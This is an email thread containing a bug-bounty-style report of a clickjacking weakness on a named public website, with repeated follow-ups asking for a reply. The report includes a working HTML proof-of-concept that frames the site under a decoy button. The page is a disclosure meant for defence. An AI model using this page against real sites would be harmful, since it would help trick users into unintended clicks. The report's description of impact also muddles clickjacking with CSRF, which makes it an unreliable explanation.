Re: [security] (Bug Report)Click jacking.

Hello Team, Please give me response regarding this issue please On Tue, Apr 5, 2022 at 4:56 PM Sakshi Patil &lt;sakshipatil017(a)gmail.com&gt; wrote: > Hello Team, > Please give me response on this issue > > On Tue, Mar 1, 2022 at 9:26 PM Sakshi Patil &lt;sakshipatil017(a)gmail.com&gt; > wrote: > >> sir any update? >> >> On Sun, Nov 22, 2020 at 8:16 PM Sakshi Patil &lt;sakshipatil017(a)gmail.com&gt; >> wrote: >> >>> *Vulnerability Name : Click jacking* >>> >>> Target URL:https://www.sparta.eu/ >>> >>> Vulnerability Description : >>> Click jacking (User Interface redress attack, UI redress attack, UI >>> redressing) is a malicious technique of tricking a Web user into clicking >>> on something different from what the user perceives they are clicking on, >>> thus potentially revealing confidential information or taking control of >>> their computer while clicking on seemingly innocuous web pages. >>> >>> The server didn't return an X-Frame-Options header which means that >>> this website could be at risk of a click jacking attack. The >>> X-Frame-Options HTTP response header can be used to indicate whether or not >>> a browser should be allowed to render a page in a <frame> or <iframe>. >>> Sites can use this to avoid click jacking attacks, by ensuring that their >>> content is not embedded into other sites. >>> >>> Typically there is one type of attack - cross site request forgeries >>> (CSRF) that can interact with functions on other websites. >>> >>> 1) This vulnerability affects Web Server. >>> <html> >>> <head> >>> <title>Clickjack test page</title> >>> </head> >>> <style> >>> #myBtn{ >>> z-index: 999; >>> position: absolute; >>> top: 100px; >>> right: 50px; >>> color: white; >>> background-color: red; >>> } >>> </style> >>> <body> >>> <!-- <h1> A Sample Test Page </h1> >>> <p>Website is vulnerable to click jacking! </p> >>> <p>Avoid random clicks </p> --> >>> <div style="z-index:-9999; position:absolute;top:0; left:0;width: 70%; >>> height:70%"> >>> <iframe src="https://www.sparta.eu/ >>> "frame1" width="100%" >>> height="100%" > >>> </iframe></div> >>> <div align="right" style="position:absolute; top:1; left:0; z-index:1; >>> width: 70%;height:60%; text-align:left;"> >>> >>> <a href="https://www.sparta.eu/ >>> "target="_blank"><button id="myBtn"> click here</button></a> >>> <!-- <a href="https://www.sparta.eu/ >>> "><button id="myBtn">Open Modal</button></a> --> >>> <div id="myModal" class="modal"> >>> <!-- Modal content --> >>> </div> >>> </body> >>> </html> >>> >>> 2.save it as <any name>.html eg s.html >>> >>> 3.and just simply open that..and click on button(direct login) its >>> redirect https://www.sparta.eu/ >>> As far as i know this data is enough to prove that your site is >>> vulnerable to Click jacking. >>> >>> Impact: >>> Attacker may tricked user, sending them malicious link then user open >>> it clicked some image and their account unconsciously has been deactivated . >>> >>> Attachment: >>> >>